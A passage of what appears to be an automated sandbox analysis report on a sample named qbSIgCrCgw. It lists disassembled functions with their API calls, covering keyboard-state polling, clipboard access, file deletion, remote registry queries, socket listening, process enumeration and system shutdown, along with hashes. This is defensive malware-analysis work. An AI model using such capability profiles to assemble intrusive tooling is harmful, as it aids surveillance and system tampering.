                                                                                • API ID: CurrentDirectoryTime$File$Local_wcscat$System__wsplitpath_wcscpy
                                                                                • String ID: *.*
                                                                                • API String ID: 3566783562-438819550
                                                                                • Opcode ID: 80a195bcb199126bb159121a070eb13a08f7d849d382edc4000f471ab357a2e2
                                                                                • Instruction ID: dba81efda2102943cc169c54340d266f481e7765ad546e2079ec548443b5a5ea
                                                                                • Opcode Fuzzy Hash: 80a195bcb199126bb159121a070eb13a08f7d849d382edc4000f471ab357a2e2
                                                                                • Instruction Fuzzy Hash: 756179B25042059FC710EF60C840AAFB3E8FF89314F04492EFA89DB251EB35E905CB96
                                                                                Function 003B6F07 Relevance: 22.1, Strings: 17, Instructions: 883COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: E$672ff0652ff0612ff0652ff0682ff06b2ff0652ff0652ff06f2ff06c2ff0682ff06b2ff0642ff0652ff06e2ff0642ff0602ff06f2ff06b2ff0672ff0602ff06c2f$ANY)$ANYCRLF)$BSR_ANYCRLF)$BSR_UNICODE)$CR)$CRLF)$LF)$LIMIT_MATCH=$LIMIT_RECURSION=$NO_AUTO_POSSESS)$NO_START_OPT)$UCP)$UTF)$UTF16)$EEE E
                                                                                • API String ID: 0-3166662482
                                                                                • Opcode ID: 83170dfb56aa102d667b71f885b6444a09998db664822b960e784a12be9c9749
                                                                                • Instruction ID: 19ce1e9bbfe4f7959f7d68d5246befa050a0a507c824158a28e9cd65950e271f
                                                                                • Opcode Fuzzy Hash: 83170dfb56aa102d667b71f885b6444a09998db664822b960e784a12be9c9749
                                                                                • Instruction Fuzzy Hash: A5729D71E042198BDF25CF59C8817EEB7B5FF48314F10816AE909EB780EB749A41DB94
                                                                                Function 003EA66C Relevance: 21.2, APIs: 14, Instructions: 178memoryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 003EABBB: GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 003EABD7
                                                                                  • Part of subcall function 003EABBB: GetLastError.KERNEL32(?,003EA69F,?,?,?), ref: 003EABE1
                                                                                  • Part of subcall function 003EABBB: GetProcessHeap.KERNEL32(00000008,?,?,003EA69F,?,?,?), ref: 003EABF0
                                                                                  • Part of subcall function 003EABBB: HeapAlloc.KERNEL32(00000000,?,003EA69F,?,?,?), ref: 003EABF7
                                                                                  • Part of subcall function 003EABBB: GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 003EAC0E
                                                                                  • Part of subcall function 003EAC56: GetProcessHeap.KERNEL32(00000008,003EA6B5,00000000,00000000,?,003EA6B5,?), ref: 003EAC62
                                                                                  • Part of subcall function 003EAC56: HeapAlloc.KERNEL32(00000000,?,003EA6B5,?), ref: 003EAC69
                                                                                  • Part of subcall function 003EAC56: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,003EA6B5,?), ref: 003EAC7A
                                                                                • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 003EA6D0
                                                                                • _memset.LIBCMT ref: 003EA6E5
                                                                                • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 003EA704
                                                                                • GetLengthSid.ADVAPI32(?), ref: 003EA715
                                                                                • GetAce.ADVAPI32(?,00000000,?), ref: 003EA752
                                                                                • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 003EA76E
                                                                                • GetLengthSid.ADVAPI32(?), ref: 003EA78B
                                                                                • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 003EA79A
                                                                                • HeapAlloc.KERNEL32(00000000), ref: 003EA7A1
                                                                                • GetLengthSid.ADVAPI32(?,00000008,?), ref: 003EA7C2
                                                                                • CopySid.ADVAPI32(00000000), ref: 003EA7C9
                                                                                • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 003EA7FA
                                                                                • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 003EA820
                                                                                • SetUserObjectSecurity.USER32(?,00000004,?), ref: 003EA834
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                                                                                • String ID:
                                                                                • API String ID: 3996160137-0
                                                                                • Opcode ID: f6981265833a66777ac0dd2e39202964433482fd657a6a91e53ab355fba16c02
                                                                                • Instruction ID: 5e4d825555cfad9708fcf62511927d6512dbb8b3ec3264b92143d712ed489b57
                                                                                • Opcode Fuzzy Hash: f6981265833a66777ac0dd2e39202964433482fd657a6a91e53ab355fba16c02
                                                                                • Instruction Fuzzy Hash: 57515D71900659AFDF05DFA6DC44AEEBBB9FF04704F048229F911AB290D734AE05CB61
                                                                                Function 003F63F9 Relevance: 19.3, APIs: 9, Strings: 2, Instructions: 89fileCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 003F6EBB: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,003F5FA6,?), ref: 003F6ED8
                                                                                  • Part of subcall function 003F72CB: GetFileAttributesW.KERNEL32(?,003F6019), ref: 003F72CC
                                                                                • _wcscat.LIBCMT ref: 003F6441
                                                                                • __wsplitpath.LIBCMT ref: 003F645F
                                                                                • FindFirstFileW.KERNEL32(?,?), ref: 003F6474
                                                                                • _wcscpy.LIBCMT ref: 003F64A3
                                                                                • _wcscat.LIBCMT ref: 003F64B8
                                                                                • _wcscat.LIBCMT ref: 003F64CA
                                                                                • DeleteFileW.KERNEL32(?), ref: 003F64DA
                                                                                • FindNextFileW.KERNEL32(00000000,00000010), ref: 003F64EB
                                                                                • FindClose.KERNEL32(00000000), ref: 003F6506
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: File$Find_wcscat$AttributesCloseDeleteFirstFullNameNextPath__wsplitpath_wcscpy
                                                                                • String ID: \*.*$p1Wu`KXu
                                                                                • API String ID: 2643075503-2866000061
                                                                                • Opcode ID: 7f6a224a5e51a3a5e31a88ac8ef14bf847f9526593ef9d8340bfe88ebf733995
                                                                                • Instruction ID: 29d67ebfb134fa782179f3b6d1bd0b9c50fcd211a704cd32eeb828b24b60a5dd
                                                                                • Opcode Fuzzy Hash: 7f6a224a5e51a3a5e31a88ac8ef14bf847f9526593ef9d8340bfe88ebf733995
                                                                                • Instruction Fuzzy Hash: BA3184B2408388AAC722EBA49885AEF77DCAF56310F44092FF6D9C7141EA35D5098767
                                                                                Function 004131BC Relevance: 16.9, APIs: 11, Instructions: 397registryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 00413C06: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00412BB5,?,?), ref: 00413C1D
                                                                                • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0041328E
                                                                                  • Part of subcall function 003B936C: __swprintf.LIBCMT ref: 003B93AB
                                                                                  • Part of subcall function 003B936C: __itow.LIBCMT ref: 003B93DF
                                                                                • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 0041332D
                                                                                • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 004133C5
                                                                                • RegCloseKey.ADVAPI32(000000FE,000000FE,00000000,?,00000000), ref: 00413604
                                                                                • RegCloseKey.ADVAPI32(00000000), ref: 00413611
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: CloseQueryValue$BuffCharConnectRegistryUpper__itow__swprintf
                                                                                • String ID:
                                                                                • API String ID: 1240663315-0
                                                                                • Opcode ID: d6824488bde82a72f23944343c281861de9251ae22047ddee049a4ba5ca8f82e
                                                                                • Instruction ID: 9567d000dc0440853b50f7ee138722ed656c7d7b4fd40bb0ec949baa41021375
                                                                                • Opcode Fuzzy Hash: d6824488bde82a72f23944343c281861de9251ae22047ddee049a4ba5ca8f82e
                                                                                • Instruction Fuzzy Hash: F8E16A35604200AFCB15DF28C991EABBBE9EF88714B04846EF54ADB261DB34ED41CB56
                                                                                Function 003F2B37 Relevance: 16.6, APIs: 11, Instructions: 119keyboardCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetKeyboardState.USER32(?), ref: 003F2B5F
                                                                                • GetAsyncKeyState.USER32(000000A0), ref: 003F2BE0
                                                                                • GetKeyState.USER32(000000A0), ref: 003F2BFB
                                                                                • GetAsyncKeyState.USER32(000000A1), ref: 003F2C15
                                                                                • GetKeyState.USER32(000000A1), ref: 003F2C2A
                                                                                • GetAsyncKeyState.USER32(00000011), ref: 003F2C42
                                                                                • GetKeyState.USER32(00000011), ref: 003F2C54
                                                                                • GetAsyncKeyState.USER32(00000012), ref: 003F2C6C
                                                                                • GetKeyState.USER32(00000012), ref: 003F2C7E
                                                                                • GetAsyncKeyState.USER32(0000005B), ref: 003F2C96
                                                                                • GetKeyState.USER32(0000005B), ref: 003F2CA8
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: State$Async$Keyboard
                                                                                • String ID:
                                                                                • API String ID: 541375521-0
                                                                                • Opcode ID: 37f62140c04aa1622f48f806e6591c5beca48661d70a37053ce26a39ef7e328d
                                                                                • Instruction ID: 8b1f1b703841ac4ea613a24ead17e2bb8deb37694b7d75035247f10202c1e4f2
                                                                                • Opcode Fuzzy Hash: 37f62140c04aa1622f48f806e6591c5beca48661d70a37053ce26a39ef7e328d
                                                                                • Instruction Fuzzy Hash: BB41B6349047CDADFF369B6489047BBBEA0AF11344F058059DBC6572C2DBA49DC8C7A2
                                                                                Function 00406D07 Relevance: 15.1, APIs: 10, Instructions: 83clipboardmemoryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                                                                • String ID:
                                                                                • API String ID: 1737998785-0
                                                                                • Opcode ID: 3a988fcb159171194b7fbddc50fd56143c123dcd847c030beeb73f8ab46c4ba7
                                                                                • Instruction ID: c38898922708f105d4fd600fe9efa7d85c2e4134e8421790fd19185e71cd5272
                                                                                • Opcode Fuzzy Hash: 3a988fcb159171194b7fbddc50fd56143c123dcd847c030beeb73f8ab46c4ba7
                                                                                • Instruction Fuzzy Hash: AC21A4317002149FDB11AF68ED4AF6E77A8FF44711F05802AF91ADB2A1DB34ED118B59
                                                                                Function 0040C18C Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 232COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 003E9ABF: CLSIDFromProgID.OLE32 ref: 003E9ADC
                                                                                  • Part of subcall function 003E9ABF: ProgIDFromCLSID.OLE32(?,00000000), ref: 003E9AF7
                                                                                  • Part of subcall function 003E9ABF: lstrcmpiW.KERNEL32(?,00000000), ref: 003E9B05
                                                                                  • Part of subcall function 003E9ABF: CoTaskMemFree.OLE32(00000000,?,00000000), ref: 003E9B15
                                                                                • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,?,?,?), ref: 0040C235
                                                                                • _memset.LIBCMT ref: 0040C242
                                                                                • _memset.LIBCMT ref: 0040C360
                                                                                • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,00000001), ref: 0040C38C
                                                                                • CoTaskMemFree.OLE32(?), ref: 0040C397
                                                                                Strings
                                                                                • NULL Pointer assignment, xrefs: 0040C3E5
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: FreeFromProgTask_memset$CreateInitializeInstanceSecuritylstrcmpi
                                                                                • String ID: NULL Pointer assignment
                                                                                • API String ID: 1300414916-2785691316
                                                                                • Opcode ID: 8e29d4ec688426566b3a737d56d357c6ba5bb22af5619073497c2cbaa1df0465
                                                                                • Instruction ID: eb98e658c4fc2b0b0fde6d4425ce8c21db3ba1e95fce0249f5fd849a0d180bda
                                                                                • Opcode Fuzzy Hash: 8e29d4ec688426566b3a737d56d357c6ba5bb22af5619073497c2cbaa1df0465
                                                                                • Instruction Fuzzy Hash: E8914B71D00218EBDB11DF94DC81EDEBBB9AF04710F10812AF915BB281DB746A45CFA4
                                                                                Function 003F79D3 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 58shutdownCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 003EB134: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 003EB180
                                                                                  • Part of subcall function 003EB134: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 003EB1AD
                                                                                  • Part of subcall function 003EB134: GetLastError.KERNEL32 ref: 003EB1BA
                                                                                • ExitWindowsEx.USER32(?,00000000), ref: 003F7A0F
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                                                                                • String ID: $@$SeShutdownPrivilege
                                                                                • API String ID: 2234035333-194228
                                                                                • Opcode ID: 0d1ec88b0d9bc404d681a59b7b708ff190e14f9551d950cf486d7404ba889a92
                                                                                • Instruction ID: de5654a5a314c3d0f69cd852c17a04def2795cf7a6e51d2d83f93718b988bdff
                                                                                • Opcode Fuzzy Hash: 0d1ec88b0d9bc404d681a59b7b708ff190e14f9551d950cf486d7404ba889a92
                                                                                • Instruction Fuzzy Hash: 8701FC716582196AFF2A16749C4AFBF725C9704740F271534FF03A61D2E5A15E0081B4
                                                                                Function 003B9B60 Relevance: 9.8, Strings: 7, Instructions: 1055COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: 672ff0652ff0612ff0652ff0682ff06b2ff0652ff0652ff06f2ff06c2ff0682ff06b2ff0642ff0652ff06e2ff0642ff0602ff06f2ff06b2ff0672ff0602ff06c2f$ERCP$VUUU$VUUU$VUUU$VUUU$E
                                                                                • API String ID: 0-2650188446
                                                                                • Opcode ID: d06822cbe3edaadf731b2d97e676ecf0151c37a05b18dea2826692b3d92e7de3
                                                                                • Instruction ID: 3cc347739be248e7121bb757aec14896081a85de0140271b7159ff32c4ea45a2
                                                                                • Opcode Fuzzy Hash: d06822cbe3edaadf731b2d97e676ecf0151c37a05b18dea2826692b3d92e7de3
                                                                                • Instruction Fuzzy Hash: F7928C71E00619CBDF25CF58C8807EEB7B1BB58318F15819AEA16ABB80D7349D81CF95
                                                                                Function 00408C4F Relevance: 9.1, APIs: 6, Instructions: 83networkCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 00408CA8
                                                                                • WSAGetLastError.WSOCK32(00000000), ref: 00408CB7
                                                                                • bind.WSOCK32(00000000,?,00000010), ref: 00408CD3
                                                                                • listen.WSOCK32(00000000,00000005), ref: 00408CE2
                                                                                • WSAGetLastError.WSOCK32(00000000), ref: 00408CFC
                                                                                • closesocket.WSOCK32(00000000,00000000), ref: 00408D10
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: ErrorLast$bindclosesocketlistensocket
                                                                                • String ID:
                                                                                • API String ID: 1279440585-0
                                                                                • Opcode ID: b1ec0fbc8c470ba9840c30d8fddd23a621c6867ada39b5d1ca72dcdecfbeb54c
                                                                                • Instruction ID: 7f2ac9b798f905723a91a311a4843e66de34a91d3e450eb4c5e033f571077383
                                                                                • Opcode Fuzzy Hash: b1ec0fbc8c470ba9840c30d8fddd23a621c6867ada39b5d1ca72dcdecfbeb54c
                                                                                • Instruction Fuzzy Hash: F221E131600204AFDB11EF28DA45B6EB7B9EF48314F10816EF957AB3E2CB34AD018B55
                                                                                Function 003F6532 Relevance: 9.1, APIs: 6, Instructions: 71processCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000), ref: 003F6554
                                                                                • Process32FirstW.KERNEL32(00000000,0000022C), ref: 003F6564
                                                                                • Process32NextW.KERNEL32(00000000,0000022C), ref: 003F6583
                                                                                • __wsplitpath.LIBCMT ref: 003F65A7
                                                                                • _wcscat.LIBCMT ref: 003F65BA
                                                                                • CloseHandle.KERNEL32(00000000,?,00000000), ref: 003F65F9
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32__wsplitpath_wcscat
                                                                                • String ID:
                                                                                • API String ID: 1605983538-0
                                                                                • Opcode ID: 2a84b06732e7efa9e9c9bf9262314d803a9dfd3c55efcee6b789c39f26e2d980
                                                                                • Instruction ID: cc68336f7c62eca919998f06ddb1e338ba7677ac37bdbf365b12ab4ab0a2e735
                                                                                • Opcode Fuzzy Hash: 2a84b06732e7efa9e9c9bf9262314d803a9dfd3c55efcee6b789c39f26e2d980
                                                                                • Instruction Fuzzy Hash: EB21847190021DABDF11ABA4DC89FEEBBBCAB49300F5004A5F609E7141EB759F85CB60
                                                                                Function 003F13CA Relevance: 8.1, APIs: 1, Strings: 4, Instructions: 560stringCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • lstrlenW.KERNEL32(?,?,?,00000000), ref: 003F13DC
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: lstrlen
                                                                                • String ID: ($,2F$<2F$|
                                                                                • API String ID: 1659193697-3944355438
                                                                                • Opcode ID: 73440854a01230edfb8aa9aea1fc2d83676a2c408391055b561e44ae410baa3b
                                                                                • Instruction ID: fbeab0a36171e7bc9b06e203f8b02b39cd9144e0cac8990338cb96704219cb47
                                                                                • Opcode Fuzzy Hash: 73440854a01230edfb8aa9aea1fc2d83676a2c408391055b561e44ae410baa3b
                                                                                • Instruction Fuzzy Hash: 98322475A00609DFC729CF29D480A6AB7F0FF48320B12C56EE59ADB7A1E770E941CB44
                                                                                Function 0040923B Relevance: 7.6, APIs: 5, Instructions: 146networkCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 0040A82C: inet_addr.WSOCK32(00000000,00000000,?,?,?,00000000), ref: 0040A84E
                                                                                • socket.WSOCK32(00000002,00000002,00000011,?,?,?,00000000), ref: 00409296
                                                                                • WSAGetLastError.WSOCK32(00000000,00000000), ref: 004092B9
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: ErrorLastinet_addrsocket
                                                                                • String ID:
                                                                                • API String ID: 4170576061-0
                                                                                • Opcode ID: a78c00439c36473e1b3144be0cfcd30e9f728aed810e7b03e57d6e473c1ffbd8
                                                                                • Instruction ID: b45a67922443d9e95a0b38b97e4a739e8c359e0f0db06ed7f5e7d11907263f10
                                                                                • Opcode Fuzzy Hash: a78c00439c36473e1b3144be0cfcd30e9f728aed810e7b03e57d6e473c1ffbd8
                                                                                • Instruction Fuzzy Hash: 5941BE70600204AFDB15AB288842F7EB7EDEF44724F04845DFA56AB2D2CB74AD018B95
                                                                                Function 003FEB60 Relevance: 7.6, APIs: 5, Instructions: 125fileCOMMON
                                                                                Download Yara Rule
                                                                                APIs
